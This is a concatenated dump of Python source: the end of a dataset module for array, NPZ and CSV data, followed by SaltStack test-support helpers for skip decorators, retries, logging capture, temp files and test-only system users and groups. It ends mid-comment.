self._seed = self.R.randint(MAX_SEED, dtype="uint32")
def __getitem__(self, index: int):
self.randomize()
if isinstance(self.dataset, ZipDataset):
# set transforms of each zip component
for dataset in self.dataset.data:
transform = getattr(dataset, "transform", None)
if isinstance(transform, Randomizable):
transform.set_random_state(seed=self._seed)
transform = getattr(self.dataset, "transform", None)
if isinstance(transform, Randomizable):
transform.set_random_state(seed=self._seed)
return self.dataset[index]
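# Illustrative sketch (not part of the original module): ArrayDataset re-seeds the
# randomized transform of every zipped component with the same seed on each
# __getitem__ call, so random augmentations applied to `img` and `seg` stay in sync.
# `_RandShift` below is a hypothetical stand-in for a real randomized transform; it
# assumes the `Randomizable` base class exposes `R`/`set_random_state` as used by
# ArrayDataset above.
def _array_dataset_sync_demo():
    class _RandShift(Randomizable):
        def randomize(self, data=None) -> None:
            pass
        def __call__(self, x):
            # one draw from the (re-seeded) random state per call
            return x + self.R.randint(0, 100)
    ds = ArrayDataset(
        img=[10, 20, 30], img_transform=_RandShift(),
        seg=[1, 2, 3], seg_transform=_RandShift(),
    )
    img_out, seg_out = ds[0]
    # both outputs are shifted by the same random offset because the two
    # transforms were seeded identically before the item was fetched
    assert img_out - 10 == seg_out - 1
    return img_out, seg_out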
class NPZDictItemDataset(Dataset):
"""
Represents a dataset from a loaded NPZ file. The members of the file to load are named in the keys of `keys` and
stored under the keyed name. All loaded arrays must have the same 0-dimension (batch) size. Items are always dicts
mapping names to an item extracted from the loaded arrays.
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
Args:
npzfile: Path to .npz file or stream containing .npz file data
keys: Maps keys to load from file to name to store in dataset
transform: Transform to apply to batch dict
other_keys: secondary data to load from file and store in dict `other_keys`, not returned by __getitem__
"""
def __init__(
self,
npzfile: Union[str, IO],
keys: Dict[str, str],
transform: Optional[Callable[..., Dict[str, Any]]] = None,
other_keys: Optional[Sequence[str]] = (),
):
self.npzfile: Union[str, IO] = npzfile if isinstance(npzfile, str) else "STREAM"
self.keys: Dict[str, str] = dict(keys)
dat = np.load(npzfile)
self.arrays = {storedk: dat[datak] for datak, storedk in self.keys.items()}
self.length = self.arrays[first(self.keys.values())].shape[0]
self.other_keys = {} if other_keys is None else {k: dat[k] for k in other_keys}
for k, v in self.arrays.items():
if v.shape[0] != self.length:
raise ValueError(
"All loaded arrays must have the same first dimension "
f"size {self.length}, array `{k}` has size {v.shape[0]}"
)
super().__init__([], transform)
def __len__(self):
return self.length
def _transform(self, index: int):
data = {k: v[index] for k, v in self.arrays.items()}
if not self.transform:
return data
result = apply_transform(self.transform, data)
if isinstance(result, dict) or (isinstance(result, list) and isinstance(result[0], dict)):
return result
raise AssertionError("With a dict supplied to apply_transform, should return a dict or a list of dicts.")
class CSVDataset(Dataset):
"""
Dataset to load data from CSV files and generate a list of dictionaries,
every dictionary maps to a row of the CSV file, and the keys of dictionary
map to the column names of the CSV file.
It can load multiple CSV files and join the tables with additional `kwargs` arg.
    It supports loading only specific rows and columns.
And it can also group several loaded columns to generate a new column, for example,
set `col_groups={"meta": ["meta_0", "meta_1", "meta_2"]}`, output can be::
[
{"image": "./image0.nii", "meta_0": 11, "meta_1": 12, "meta_2": 13, "meta": [11, 12, 13]},
{"image": "./image1.nii", "meta_0": 21, "meta_1": 22, "meta_2": 23, "meta": [21, 22, 23]},
]
Args:
filename: the filename of expected CSV file to load. if providing a list
of filenames, it will load all the files and join tables.
row_indices: indices of the expected rows to load. it should be a list,
            every item can be an int number or a range `[start, end)` for the indices.
for example: `row_indices=[[0, 100], 200, 201, 202, 300]`. if None,
load all the rows in the file.
col_names: names of the expected columns to load. if None, load all the columns.
col_types: `type` and `default value` to convert the loaded columns, if None, use original data.
it should be a dictionary, every item maps to an expected column, the `key` is the column
name and the `value` is None or a dictionary to define the default value and data type.
the supported keys in dictionary are: ["type", "default"]. for example::
col_types = {
"subject_id": {"type": str},
"label": {"type": int, "default": 0},
"ehr_0": {"type": float, "default": 0.0},
"ehr_1": {"type": float, "default": 0.0},
"image": {"type": str, "default": None},
}
col_groups: args to group the loaded columns to generate a new column,
it should be a dictionary, every item maps to a group, the `key` will
be the new column name, the `value` is the names of columns to combine. for example:
`col_groups={"ehr": [f"ehr_{i}" for i in range(10)], "meta": ["meta_1", "meta_2"]}`
transform: transform to apply on the loaded items of a dictionary data.
kwargs: additional arguments for `pandas.merge()` API to join tables.
"""
def __init__(
self,
filename: Union[str, Sequence[str]],
row_indices: Optional[Sequence[Union[int, str]]] = None,
col_names: Optional[Sequence[str]] = None,
col_types: Optional[Dict[str, Optional[Dict[str, Any]]]] = None,
col_groups: Optional[Dict[str, Sequence[str]]] = None,
transform: Optional[Callable] = None,
**kwargs,
):
files = ensure_tuple(filename)
dfs = [pd.read_csv(f) for f in files]
data = convert_tables_to_dicts(
dfs=dfs, row_indices=row_indices, col_names=col_names, col_types=col_types, col_groups=col_groups, **kwargs
)
super().__init__(data=data, transform=transform)
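# Illustrative sketch (not part of the original module): the CSV content, file name and
# column names below are hypothetical; the exact output keys follow
# convert_tables_to_dicts.
def _csv_dataset_demo():
    import os
    import tempfile
    content = "subject_id,label,image\ns1,1,./image0.nii\ns2,0,./image1.nii\n"
    with tempfile.NamedTemporaryFile("w", suffix=".csv", delete=False) as f:
        f.write(content)
        path = f.name
    ds = CSVDataset(
        filename=path,
        col_types={"label": {"type": int, "default": 0}},
        col_groups={"meta": ["subject_id", "label"]},
    )
    os.remove(path)
    # e.g. {"subject_id": "s1", "label": 1, "image": "./image0.nii", "meta": ["s1", 1]}
    return ds[0]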
|
helpers.py
|
# -*- coding: utf-8 -*-
"""
:copyright: Copyright 2013-2017 by the SaltStack Team, see AUTHORS for more details.
:license: Apache 2.0, see LICENSE for more details.
tests.support.helpers
~~~~~~~~~~~~~~~~~~~~~
Test support helpers
"""
# pylint: disable=repr-flag-used-in-string,wrong-import-order
from __future__ import absolute_import, print_function, unicode_literals
import base64
import errno
import fnmatch
import functools
import inspect
import logging
import os
import random
import shutil
import socket
import string
import subprocess
import sys
import tempfile
import textwrap
import threading
import time
import types
import pytest
import salt.ext.tornado.ioloop
import salt.ext.tornado.web
import salt.utils.files
import salt.utils.platform
import salt.utils.stringutils
import salt.utils.versions
from pytestsalt.utils import get_unused_localhost_port
from salt.ext import six
from salt.ext.six.moves import builtins, range
from tests.support.mock import patch
from tests.support.runtests import RUNTIME_VARS
from tests.support.sminion import create_sminion
from tests.support.unit import SkipTest, _id, skip
log = logging.getLogger(__name__)
HAS_SYMLINKS = None
PRE_PYTEST_SKIP_OR_NOT = "PRE_PYTEST_DONT_SKIP" not in os.environ
PRE_PYTEST_SKIP_REASON = (
"PRE PYTEST - This test was skipped before running under pytest"
)
PRE_PYTEST_SKIP = pytest.mark.skipif(
PRE_PYTEST_SKIP_OR_NOT, reason=PRE_PYTEST_SKIP_REASON
)
def no_symlinks():
"""
Check if git is installed and has symlinks enabled in the configuration.
"""
global HAS_SYMLINKS
if HAS_SYMLINKS is not None:
return not HAS_SYMLINKS
output = ""
try:
output = subprocess.Popen(
["git", "config", "--get", "core.symlinks"],
cwd=RUNTIME_VARS.TMP,
stdout=subprocess.PIPE,
).communicate()[0]
except OSError as exc:
if exc.errno != errno.ENOENT:
raise
except subprocess.CalledProcessError:
# git returned non-zero status
pass
HAS_SYMLINKS = False
if output.strip() == "true":
HAS_SYMLINKS = True
return not HAS_SYMLINKS
def destructiveTest(caller):
"""
    Mark a test case as a destructive test, for example adding or removing users
from your system.
.. code-block:: python
class MyTestCase(TestCase):
@destructiveTest
def test_create_user(self):
pass
"""
# Late import
from tests.support.runtests import RUNTIME_VARS
if RUNTIME_VARS.PYTEST_SESSION:
setattr(caller, "__destructive_test__", True)
if inspect.isclass(caller):
# We're decorating a class
old_setup = getattr(caller, "setUp", None)
def setUp(self, *args, **kwargs):
if os.environ.get("DESTRUCTIVE_TESTS", "False").lower() == "false":
self.skipTest("Destructive tests are disabled")
if old_setup is not None:
old_setup(self, *args, **kwargs)
caller.setUp = setUp
return caller
# We're simply decorating functions
@functools.wraps(caller)
def wrap(cls):
if os.environ.get("DESTRUCTIVE_TESTS", "False").lower() == "false":
cls.skipTest("Destructive tests are disabled")
return caller(cls)
return wrap
def expensiveTest(caller):
"""
Mark a test case as an expensive test, for example, a test which can cost
    money (Salt's cloud provider tests).
.. code-block:: python
class MyTestCase(TestCase):
@expensiveTest
def test_create_user(self):
pass
"""
# Late import
from tests.support.runtests import RUNTIME_VARS
if RUNTIME_VARS.PYTEST_SESSION:
setattr(caller, "__expensive_test__", True)
if inspect.isclass(caller):
# We're decorating a class
old_setup = getattr(caller, "setUp", None)
def setUp(self, *args, **kwargs):
if os.environ.get("EXPENSIVE_TESTS", "False").lower() == "false":
self.skipTest("Expensive tests are disabled")
if old_setup is not None:
old_setup(self, *args, **kwargs)
caller.setUp = setUp
return caller
# We're simply decorating functions
@functools.wraps(caller)
def wrap(cls):
if os.environ.get("EXPENSIVE_TESTS", "False").lower() == "false":
cls.skipTest("Expensive tests are disabled")
return caller(cls)
return wrap
def flaky(caller=None, condition=True, attempts=4):
"""
    Mark a test as flaky. The test will be attempted up to four times by default,
    looking for a successful run. After an immediate second try, it retries with
    an exponential backoff starting at one second.
.. code-block:: python
class MyTestCase(TestCase):
@flaky
def test_sometimes_works(self):
pass
"""
if caller is None:
return functools.partial(flaky, condition=condition, attempts=attempts)
if isinstance(condition, bool) and condition is False:
# Don't even decorate
return caller
elif callable(condition):
if condition() is False:
# Don't even decorate
return caller
if inspect.isclass(caller):
attrs = [n for n in dir(caller) if n.startswith("test_")]
for attrname in attrs:
try:
function = getattr(caller, attrname)
if not inspect.isfunction(function) and not inspect.ismethod(function):
continue
setattr(
caller,
attrname,
flaky(caller=function, condition=condition, attempts=attempts),
)
except Exception as exc: # pylint: disable=broad-except
log.exception(exc)
continue
return caller
@functools.wraps(caller)
def wrap(cls):
for attempt in range(0, attempts):
try:
if attempt > 0:
# Run through setUp again
# We only run it after the first iteration(>0) because the regular
                    # test runner will have already run setUp the first time
setup = getattr(cls, "setUp", None)
if callable(setup):
setup()
return caller(cls)
except SkipTest as exc:
cls.skipTest(exc.args[0])
except Exception as exc: # pylint: disable=broad-except
exc_info = sys.exc_info()
if isinstance(exc, SkipTest):
six.reraise(*exc_info)
if not isinstance(exc, AssertionError) and log.isEnabledFor(
logging.DEBUG
):
log.exception(exc, exc_info=exc_info)
if attempt >= attempts - 1:
# We won't try to run tearDown once the attempts are exhausted
# because the regular test runner will do that for us
six.reraise(*exc_info)
# Run through tearDown again
teardown = getattr(cls, "tearDown", None)
if callable(teardown):
teardown()
backoff_time = attempt ** 2
log.info("Found Exception. Waiting %s seconds to retry.", backoff_time)
time.sleep(backoff_time)
return cls
return wrap
def requires_sshd_server(caller):
"""
    Mark a test as requiring the test suite's SSH daemon to be running.
    .. code-block:: python
        class MyTestCase(TestCase):
            @requires_sshd_server
def test_create_user(self):
pass
"""
if inspect.isclass(caller):
# We're decorating a class
old_setup = getattr(caller, "setUp", None)
def setUp(self, *args, **kwargs):
if os.environ.get("SSH_DAEMON_RUNNING", "False").lower() == "false":
self.skipTest("SSH tests are disabled")
if old_setup is not None:
old_setup(self, *args, **kwargs)
caller.setUp = setUp
return caller
# We're simply decorating functions
@functools.wraps(caller)
def wrap(cls):
if os.environ.get("SSH_DAEMON_RUNNING", "False").lower() == "false":
cls.skipTest("SSH tests are disabled")
return caller(cls)
return wrap
class RedirectStdStreams(object):
"""
    Temporarily redirect system output to file-like objects.
    By default, `stdout` and `stderr` are redirected to `os.devnull`, which
    simply mutes the output.
"""
def __init__(self, stdout=None, stderr=None):
# Late import
import salt.utils.files
if stdout is None:
# pylint: disable=resource-leakage
stdout = salt.utils.files.fopen(os.devnull, "w")
# pylint: enable=resource-leakage
if stderr is None:
# pylint: disable=resource-leakage
stderr = salt.utils.files.fopen(os.devnull, "w")
# pylint: enable=resource-leakage
self.__stdout = stdout
self.__stderr = stderr
self.__redirected = False
self.patcher = patch.multiple(sys, stderr=self.__stderr, stdout=self.__stdout)
def __enter__(self):
self.redirect()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.unredirect()
def redirect(self):
self.old_stdout = sys.stdout
self.old_stdout.flush()
self.old_stderr = sys.stderr
self.old_stderr.flush()
self.patcher.start()
self.__redirected = True
def unredirect(self):
if not self.__redirected:
return
try:
self.__stdout.flush()
self.__stdout.close()
except ValueError:
# already closed?
pass
try:
self.__stderr.flush()
self.__stderr.close()
except ValueError:
# already closed?
pass
self.patcher.stop()
def flush(self):
if self.__redirected:
try:
self.__stdout.flush()
except Exception: # pylint: disable=broad-except
pass
try:
self.__stderr.flush()
except Exception: # pylint: disable=broad-except
pass
class TstSuiteLoggingHandler(object):
"""
Simple logging handler which can be used to test if certain logging
messages get emitted or not:
.. code-block:: python
with TstSuiteLoggingHandler() as handler:
# (...) Do what ever you wish here
handler.messages # here are the emitted log messages
"""
def __init__(self, level=0, format="%(levelname)s:%(message)s"):
self.level = level
self.format = format
self.activated = False
self.prev_logging_level = None
def activate(self):
class Handler(logging.Handler):
def __init__(self, level):
logging.Handler.__init__(self, level)
self.messages = []
def emit(self, record):
self.messages.append(self.format(record))
self.handler = Handler(self.level)
formatter = logging.Formatter(self.format)
self.handler.setFormatter(formatter)
logging.root.addHandler(self.handler)
self.activated = True
# Make sure we're running with the lowest logging level with our
# tests logging handler
current_logging_level = logging.root.getEffectiveLevel()
if current_logging_level > logging.DEBUG:
self.prev_logging_level = current_logging_level
logging.root.setLevel(0)
def deactivate(self):
if not self.activated:
return
logging.root.removeHandler(self.handler)
# Restore previous logging level if changed
if self.prev_logging_level is not None:
logging.root.setLevel(self.prev_logging_level)
@property
def messages(self):
if not self.activated:
return []
return self.handler.messages
def clear(self):
self.handler.messages = []
def __enter__(self):
self.activate()
return self
def __exit__(self, type, value, traceback):
self.deactivate()
self.activated = False
# Mimic some handler attributes and methods
@property
def lock(self):
if self.activated:
return self.handler.lock
def createLock(self):
if self.activated:
return self.handler.createLock()
def acquire(self):
if self.activated:
return self.handler.acquire()
def release(self):
if self.activated:
return self.handler.release()
class ForceImportErrorOn(object):
"""
This class is meant to be used in mock'ed test cases which require an
``ImportError`` to be raised.
>>> import os.path
>>> with ForceImportErrorOn('os.path'):
... import os.path
...
Traceback (most recent call last):
File "<stdin>", line 2, in <module>
File "salttesting/helpers.py", line 263, in __import__
'Forced ImportError raised for {0!r}'.format(name)
ImportError: Forced ImportError raised for 'os.path'
>>>
>>> with ForceImportErrorOn(('os', 'path')):
... import os.path
... sys.modules.pop('os', None)
... from os import path
...
<module 'os' from '/usr/lib/python2.7/os.pyc'>
Traceback (most recent call last):
File "<stdin>", line 4, in <module>
File "salttesting/helpers.py", line 288, in __fake_import__
name, ', '.join(fromlist)
ImportError: Forced ImportError raised for 'from os import path'
>>>
>>> with ForceImportErrorOn(('os', 'path'), 'os.path'):
... import os.path
... sys.modules.pop('os', None)
... from os import path
...
Traceback (most recent call last):
File "<stdin>", line 2, in <module>
File "salttesting/helpers.py", line 281, in __fake_import__
'Forced ImportError raised for {0!r}'.format(name)
ImportError: Forced ImportError raised for 'os.path'
>>>
"""
def __init__(self, *module_names):
self.__module_names = {}
for entry in module_names:
if isinstance(entry, (list, tuple)):
modname = entry[0]
self.__module_names[modname] = set(entry[1:])
else:
self.__module_names[entry] = None
self.__original_import = builtins.__import__
self.patcher = patch.object(builtins, "__import__", self.__fake_import__)
def patch_import_function(self):
self.patcher.start()
def restore_import_funtion(self):
self.patcher.stop()
def __fake_import__(
self, name, globals_=None, locals_=None, fromlist=None, level=None
):
if six.PY2:
if globals_ is None:
globals_ = {}
if locals_ is None:
locals_ = {}
if level is None:
if six.PY2:
level = -1
else:
level = 0
if fromlist is None:
fromlist = []
if name in self.__module_names:
importerror_fromlist = self.__module_names.get(name)
if importerror_fromlist is None:
raise ImportError("Forced ImportError raised for {0!r}".format(name))
if importerror_fromlist.intersection(set(fromlist)):
raise ImportError(
"Forced ImportError raised for {0!r}".format(
"from {0} import {1}".format(name, ", ".join(fromlist))
)
)
return self.__original_import(name, globals_, locals_, fromlist, level)
def __enter__(self):
self.patch_import_function()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.restore_import_funtion()
class MockWraps(object):
"""
Helper class to be used with the mock library.
To be used in the ``wraps`` keyword of ``Mock`` or ``MagicMock`` where you
want to trigger a side effect for X times, and afterwards, call the
original and un-mocked method.
As an example:
>>> def original():
... print 'original'
...
>>> def side_effect():
... print 'side effect'
...
>>> mw = MockWraps(original, 2, side_effect)
>>> mw()
side effect
>>> mw()
side effect
>>> mw()
original
>>>
"""
def __init__(self, original, expected_failures, side_effect):
self.__original = original
self.__expected_failures = expected_failures
self.__side_effect = side_effect
self.__call_counter = 0
def __call__(self, *args, **kwargs):
try:
if self.__call_counter < self.__expected_failures:
if isinstance(self.__side_effect, types.FunctionType):
return self.__side_effect()
raise self.__side_effect
return self.__original(*args, **kwargs)
finally:
self.__call_counter += 1
def requires_network(only_local_network=False):
"""
Simple decorator which is supposed to skip a test case in case there's no
network connection to the internet.
"""
def decorator(func):
@functools.wraps(func)
def wrapper(cls):
has_local_network = False
# First lets try if we have a local network. Inspired in
# verify_socket
try:
pubsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
retsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
pubsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
pubsock.bind(("", 18000))
pubsock.close()
retsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
retsock.bind(("", 18001))
retsock.close()
has_local_network = True
except socket.error:
# I wonder if we just have IPV6 support?
try:
pubsock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
retsock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
pubsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
pubsock.bind(("", 18000))
pubsock.close()
retsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
retsock.bind(("", 18001))
retsock.close()
has_local_network = True
except socket.error:
# Let's continue
pass
if only_local_network is True:
if has_local_network is False:
# Since we're only supposed to check local network, and no
# local network was detected, skip the test
cls.skipTest("No local network was detected")
return func(cls)
if os.environ.get("NO_INTERNET"):
cls.skipTest("Environment variable NO_INTERNET is set.")
# We are using the google.com DNS records as numerical IPs to avoid
# DNS lookups which could greatly slow down this check
for addr in (
"173.194.41.198",
"173.194.41.199",
"173.194.41.200",
"173.194.41.201",
"173.194.41.206",
"173.194.41.192",
"173.194.41.193",
"173.194.41.194",
"173.194.41.195",
"173.194.41.196",
"173.194.41.197",
):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.settimeout(0.25)
sock.connect((addr, 80))
# We connected? Stop the loop
break
except socket.error:
# Let's check the next IP
continue
else:
cls.skipTest("No internet network connection was detected")
finally:
sock.close()
return func(cls)
return wrapper
return decorator
def with_system_user(
username, on_existing="delete", delete=True, password=None, groups=None
):
"""
Create and optionally destroy a system user to be used within a test
case. The system user is created using the ``user`` salt module.
The decorated testcase function must accept 'username' as an argument.
:param username: The desired username for the system user.
:param on_existing: What to do when the desired username is taken. The
available options are:
* nothing: Do nothing, act as if the user was created.
* delete: delete and re-create the existing user
* skip: skip the test case
"""
if on_existing not in ("nothing", "delete", "skip"):
raise RuntimeError(
"The value of 'on_existing' can only be one of, "
"'nothing', 'delete' and 'skip'"
)
if not isinstance(delete, bool):
raise RuntimeError("The value of 'delete' can only be 'True' or 'False'")
def decorator(func):
@functools.wraps(func)
def wrap(cls):
# Let's add the user to the system.
log.debug("Creating system user {0!r}".format(username))
kwargs = {"timeout": 60, "groups": groups}
if salt.utils.platform.is_windows():
kwargs.update({"password": password})
create_user = cls.run_function("user.add", [username], **kwargs)
if not create_user:
log.debug("Failed to create system user")
# The user was not created
if on_existing == "skip":
cls.skipTest("Failed to create system user {0!r}".format(username))
if on_existing == "delete":
log.debug("Deleting the system user {0!r}".format(username))
delete_user = cls.run_function(
"user.delete", [username, True, True]
)
if not delete_user:
cls.skipTest(
"A user named {0!r} already existed on the "
"system and re-creating it was not possible".format(
username
)
)
log.debug("Second time creating system user {0!r}".format(username))
create_user = cls.run_function("user.add", [username], **kwargs)
if not create_user:
cls.skipTest(
"A user named {0!r} already existed, was deleted "
"as requested, but re-creating it was not possible".format(
username
)
)
failure = None
try:
try:
return func(cls, username)
except Exception as exc: # pylint: disable=W0703
log.error(
"Running {0!r} raised an exception: {1}".format(func, exc),
exc_info=True,
)
# Store the original exception details which will be raised
# a little further down the code
failure = sys.exc_info()
finally:
if delete:
delete_user = cls.run_function(
"user.delete", [username, True, True], timeout=60
)
if not delete_user:
if failure is None:
log.warning(
"Although the actual test-case did not fail, "
"deleting the created system user {0!r} "
"afterwards did.".format(username)
)
else:
log.warning(
"The test-case failed and also did the removal"
" of the system user {0!r}".format(username)
)
if failure is not None:
# If an exception was thrown, raise it
six.reraise(failure[0], failure[1], failure[2])
return wrap
return decorator
def with_system_group(group, on_existing="delete", delete=True):
"""
Create and optionally destroy a system group to be used within a test
    case. The system group is created using the ``group`` salt module.
    The decorated testcase function must accept 'group' as an argument.
    :param group: The desired name for the system group.
:param on_existing: What to do when the desired username is taken. The
available options are:
* nothing: Do nothing, act as if the group was created
* delete: delete and re-create the existing user
* skip: skip the test case
"""
if on_existing not in ("nothing", "delete", "skip"):
raise RuntimeError(
"The value of 'on_existing' can only be one of, "
"'nothing', 'delete' and 'skip'"
)
if not isinstance(delete, bool):
raise RuntimeError("The value of 'delete' can only be 'True' or 'False'")
def decorator(func):
@functools.wraps(func)
def wrap(cls):
# Let's add the user to the system.
log.debug("Creating system group {0!r}".format(group))
create_group = cls.run_function("group.add", [group])
if not create_group:
log.debug("Failed to create system group")
# The group was not created
if on_existing == "skip":
cls.skipTest("Failed to create system group {0!r}".format(group))
if on_existing == "delete":
log.debug("Deleting the system group {0!r}".format(group))
delete_group = cls.run_function("group.delete", [group])
if not delete_group:
cls.skipTest(
"A group named {0!r} already existed on the "
"system and re-creating it was not possible".format(group)
)
log.debug("Second time creating system group {0!r}".format(group))
create_group = cls.run_function("group.add", [group])
if not create_group:
cls.skipTest(
"A group named {0!r} already existed, was deleted "
"as requested, but re-creating it was not possible".format(
group
)
)
failure = None
try:
try:
return func(cls, group)
except Exception as exc: # pylint: disable=W0703
log.error(
"Running {0!r} raised an exception: {1}".format(func, exc),
exc_info=True,
)
# Store the original exception details which will be raised
# a little further down the code
failure = sys.exc_info()
finally:
if delete:
delete_group = cls.run_function("group.delete", [group])
if not delete_group:
if failure is None:
log.warning(
"Although the actual test-case did not fail, "
"deleting the created system group {0!r} "
"afterwards did.".format(group)
)
else:
log.warning(
"The test-case failed and also did the removal"
" of the system group {0!r}".format(group)
)
if failure is not None:
# If an exception was thrown, raise it
six.reraise(failure[0], failure[1], failure[2])
return wrap
return decorator
def with_system_user_and_group(username, group, on_existing="delete", delete=True):
"""
Create and optionally destroy a system user and group to be used within a
    test case. The system user is created using the ``user`` salt module, and
the system group is created with the ``group`` salt module.
The decorated testcase function must accept both the 'username' and 'group'
arguments.
:param username: The desired username for the system user.
:param group: The desired name for the system group.
:param on_existing: What to do when the desired username is taken. The
available options are:
* nothing: Do nothing, act as if the user was created.
* delete: delete and re-create the existing user
* skip: skip the test case
"""
if on_existing not in ("nothing", "delete", "skip"):
raise RuntimeError(
"The value of 'on_existing' can only be one of, "
"'nothing', 'delete' and 'skip'"
)
if not isinstance(delete, bool):
raise RuntimeError("The value of 'delete' can only be 'True' or 'False'")
def decorator(func):
@functools.wraps(func)
def wrap(cls):
# Let's add the user to the system.
log.debug("Creating system user {0!r}".format(username))
create_user = cls.run_function("user.add", [username])
log.debug("Creating system group {0!r}".format(group))
create_group = cls.run_function("group.add", [group])
if not create_user:
log.debug("Failed to create system user")
# The user was not created
if on_existing == "skip":
cls.skipTest("Failed to create system user {0!r}".format(username))
if on_existing == "delete":
log.debug("Deleting the system user {0!r}".format(username))
delete_user = cls.run_function(
"user.delete", [username, True, True]
)
if not delete_user:
cls.skipTest(
"A user named {0!r} already existed on the "
"system and re-creating it was not possible".format(
username
)
)
log.debug("Second time creating system user {0!r}".format(username))
create_user = cls.run_function("user.add", [username])
if not create_user:
cls.skipTest(
"A user named {0!r} already existed, was deleted "
"as requested, but re-creating it was not possible".format(
username
)
)
if not create_group:
log.debug("Failed to create system group")
# The group was not created
if on_existing == "skip":
cls.skipTest("Failed to create system group {0!r}".format(group))
if on_existing == "delete":
log.debug("Deleting the system group {0!r}".format(group))
delete_group = cls.run_function("group.delete", [group])
if not delete_group:
cls.skipTest(
"A group named {0!r} already existed on the "
"system and re-creating it was not possible".format(group)
)
log.debug("Second time creating system group {0!r}".format(group))
create_group = cls.run_function("group.add", [group])
if not create_group:
cls.skipTest(
"A group named {0!r} already existed, was deleted "
"as requested, but re-creating it was not possible".format(
group
)
)
failure = None
try:
try:
return func(cls, username, group)
except Exception as exc: # pylint: disable=W0703
log.error(
"Running {0!r} raised an exception: {1}".format(func, exc),
exc_info=True,
)
# Store the original exception details which will be raised
# a little further down the code
failure = sys.exc_info()
finally:
if delete:
delete_user = cls.run_function(
"user.delete", [username, True, True]
)
delete_group = cls.run_function("group.delete", [group])
if not delete_user:
if failure is None:
log.warning(
"Although the actual test-case did not fail, "
"deleting the created system user {0!r} "
"afterwards did.".format(username)
)
else:
log.warning(
"The test-case failed and also did the removal"
" of the system user {0!r}".format(username)
)
if not delete_group:
if failure is None:
log.warning(
"Although the actual test-case did not fail, "
"deleting the created system group {0!r} "
"afterwards did.".format(group)
)
else:
log.warning(
"The test-case failed and also did the removal"
" of the system group {0!r}".format(group)
)
if failure is not None:
# If an exception was thrown, raise it
six.reraise(failure[0], failure[1], failure[2])
return wrap
return decorator
class WithTempfile(object):
def __init__(self, **kwargs):
self.create = kwargs.pop("create", True)
if "dir" not in kwargs:
kwargs["dir"] = RUNTIME_VARS.TMP
if "prefix" not in kwargs:
kwargs["prefix"] = "__salt.test."
self.kwargs = kwargs
def __call__(self, func):
self.func = func
return functools.wraps(func)(
# pylint: disable=unnecessary-lambda
lambda testcase, *args, **kwargs: self.wrap(testcase, *args, **kwargs)
# pylint: enable=unnecessary-lambda
)
def wrap(self, testcase, *args, **kwargs):
name = salt.utils.files.mkstemp(**self.kwargs)
if not self.create:
os.remove(name)
try:
return self.func(testcase, name, *args, **kwargs)
finally:
try:
os.remove(name)
except OSError:
pass
with_tempfile = WithTempfile
class WithTempdir(object):
def __init__(self, **kwargs):
self.create = kwargs.pop("create", True)
if "dir" not in kwargs:
kwargs["dir"] = RUNTIME_VARS.TMP
self.kwargs = kwargs
def __call__(self, func):
self.func = func
return functools.wraps(func)(
# pylint: disable=unnecessary-lambda
lambda testcase, *args, **kwargs: self.wrap(testcase, *args, **kwargs)
# pylint: enable=unnecessary-lambda
)
def wrap(self, testcase, *args, **kwargs):
tempdir = tempfile.mkdtemp(**self.kwargs)
if not self.create:
os.rmdir(tempdir)
try:
return self.func(testcase, tempdir, *args, **kwargs)
finally:
shutil.rmtree(tempdir, ignore_errors=True)
with_tempdir = WithTempdir
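def _with_temp_decorators_demo():
    """
    Illustrative sketch (not part of the original helpers): shows the calling
    convention only; ``FakeCase`` is a hypothetical stand-in for a real TestCase
    and the demo assumes the salt test runtime (RUNTIME_VARS) is initialised.
    """
    class FakeCase(object):
        @with_tempfile(create=False)
        def test_writes_file(self, name):
            # ``name`` is a fresh temp path (already removed because create=False)
            with salt.utils.files.fopen(name, "w") as fp:
                fp.write("data")
        @with_tempdir()
        def test_uses_dir(self, tempdir):
            # ``tempdir`` exists for the duration of the test and is removed afterwards
            assert os.path.isdir(tempdir)
    return FakeCase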
def requires_system_grains(func):
"""
Function decorator which loads and passes the system's grains to the test
case.
"""
@functools.wraps(func)
def decorator(*args, **kwargs):
if not hasattr(requires_system_grains, "__grains__"):
# Late import
from tests.support.sminion import build_minion_opts
opts = build_minion_opts(minion_id="runtests-internal-sminion")
requires_system_grains.__grains__ = salt.loader.grains(opts)
kwargs["grains"] = requires_system_grains.__grains__
return func(*args, **kwargs)
return decorator
@requires_system_grains
def runs_on(grains=None, **kwargs):
"""
    Skip the test if the grains don't match the values passed into **kwargs.
    If a kwarg value is a list, skip if the grains don't match any item in the list.
"""
def decorator(caller):
@functools.wraps(caller)
def wrapper(cls):
reason = kwargs.pop("reason", None)
for kw, value in kwargs.items():
if isinstance(value, list):
if not any(
                        str(grains.get(kw)).lower() == str(v).lower() for v in value
):
if reason is None:
reason = "This test does not run on {}={}".format(
kw, grains.get(kw)
)
raise SkipTest(reason)
else:
if str(grains.get(kw)).lower() != str(value).lower():
if reason is None:
reason = "This test runs on {}={}, not {}".format(
kw, value, grains.get(kw)
)
raise SkipTest(reason)
return caller(cls)
return wrapper
return decorator
@requires_system_grains
def not_runs_on(grains=None, **kwargs):
"""
Reverse of `runs_on`.
    Skip the test if any grains match the values passed into **kwargs.
    If a kwarg value is a list, skip if the grains match any item in the list.
"""
def decorator(caller):
@functools.wraps(caller)
def wrapper(cls):
reason = kwargs.pop("reason", None)
for kw, value in kwargs.items():
if isinstance(value, list):
if any(
str(grains.get(kw)).lower() == str(v).lower() for v in value
):
if reason is None:
reason = "This test does not run on {}={}".format(
kw, grains.get(kw)
)
raise SkipTest(reason)
else:
if str(grains.get(kw)).lower() == str(value).lower():
if reason is None:
reason = "This test does not run on {}={}, got {}".format(
kw, value, grains.get(kw)
)
raise SkipTest(reason)
return caller(cls)
return wrapper
return decorator
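# Illustrative usage sketch (not part of the original helpers); the grain names and
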